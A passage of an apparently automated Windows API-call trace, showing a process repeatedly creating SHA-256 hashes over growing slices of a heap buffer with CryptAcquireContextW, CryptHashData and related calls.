	[0192.581] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.581] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.581] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.581] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.581] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0192.581] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.581] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23023a0
	[0192.581] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23023a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23023a0, pdwDataLen=0x1283b0) returned 1
	[0192.581] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.582] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.582] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.582] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.582] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0192.582] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.582] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23023c8
	[0192.582] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23023c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23023c8, pdwDataLen=0x1283b0) returned 1
	[0192.582] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.582] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.582] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.583] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.583] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0192.584] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.584] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23023f0
	[0192.584] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23023f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23023f0, pdwDataLen=0x1283b0) returned 1
	[0192.584] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.584] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.584] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.584] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.584] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0192.584] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.584] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302418
	[0192.584] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302418, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302418, pdwDataLen=0x1283b0) returned 1
	[0192.584] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.585] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.585] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.585] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.585] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0192.585] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.585] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302440
	[0192.585] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302440, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302440, pdwDataLen=0x1283b0) returned 1
	[0192.585] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.585] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.585] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.586] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.586] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0192.586] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.586] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302468
	[0192.586] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302468, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302468, pdwDataLen=0x1283b0) returned 1
	[0192.586] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.586] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.586] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.587] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.587] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0192.587] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.587] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302490
	[0192.587] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302490, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302490, pdwDataLen=0x1283b0) returned 1
	[0192.587] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.587] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.587] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.588] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.588] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0192.588] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.588] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23024b8
	[0192.588] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23024b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23024b8, pdwDataLen=0x1283b0) returned 1
	[0192.588] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.588] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.588] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.588] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.588] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0192.588] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.589] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23024e0
	[0192.589] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23024e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23024e0, pdwDataLen=0x1283b0) returned 1
	[0192.589] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.589] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.589] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2753bd8) returned 1
	[0192.589] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2753bd8
	[0192.589] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.589] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.589] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0192.589] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.589] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302508
	[0192.589] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302508, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302508, pdwDataLen=0x1283b0) returned 1
	[0192.589] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.589] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.590] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.590] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.590] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0192.590] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.590] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302530
	[0192.590] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302530, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302530, pdwDataLen=0x1283b0) returned 1
	[0192.590] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.590] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.590] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.591] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.591] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0192.591] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.591] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302558
	[0192.591] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302558, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302558, pdwDataLen=0x1283b0) returned 1
	[0192.591] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.591] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.591] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.592] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.592] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0192.592] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.592] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302580
	[0192.592] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302580, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302580, pdwDataLen=0x1283b0) returned 1
	[0192.592] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.592] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.592] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.592] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.592] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0192.592] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.592] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23025a8
	[0192.592] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23025a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23025a8, pdwDataLen=0x1283b0) returned 1
	[0192.593] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.593] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.593] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.593] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.593] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0192.593] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.593] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23025d0
	[0192.593] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23025d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23025d0, pdwDataLen=0x1283b0) returned 1
	[0192.593] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.593] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.593] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.594] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.594] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0192.594] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.594] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23025f8
	[0192.594] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23025f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23025f8, pdwDataLen=0x1283b0) returned 1
	[0192.594] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.594] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.594] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.595] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.595] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0192.595] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.595] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302620
	[0192.595] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302620, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302620, pdwDataLen=0x1283b0) returned 1
	[0192.595] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.595] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.595] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.595] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.595] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0192.595] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302648
	[0192.596] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302648, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302648, pdwDataLen=0x1283b0) returned 1
	[0192.596] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.596] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.596] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.596] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.596] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0192.596] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.596] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302670
	[0192.596] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302670, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302670, pdwDataLen=0x1283b0) returned 1
	[0192.596] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.596] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.596] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.597] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.597] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0192.597] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.597] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302698
	[0192.597] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302698, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302698, pdwDataLen=0x1283b0) returned 1
	[0192.597] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.597] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.597] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.598] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.598] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0192.598] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.598] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23026c0
	[0192.598] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23026c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23026c0, pdwDataLen=0x1283b0) returned 1
	[0192.598] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.598] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.598] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.599] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.599] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0192.599] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23026e8
	[0192.599] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23026e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23026e8, pdwDataLen=0x1283b0) returned 1
	[0192.599] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.599] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.599] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.600] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.600] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0192.600] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.600] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302710
	[0192.600] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302710, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302710, pdwDataLen=0x1283b0) returned 1
	[0192.600] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.600] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.600] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.600] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.600] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0192.600] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.600] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302738
	[0192.600] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302738, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302738, pdwDataLen=0x1283b0) returned 1
	[0192.600] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.600] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.601] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.601] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.601] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0192.601] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.601] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302760
	[0192.601] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302760, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302760, pdwDataLen=0x1283b0) returned 1
	[0192.601] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.601] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
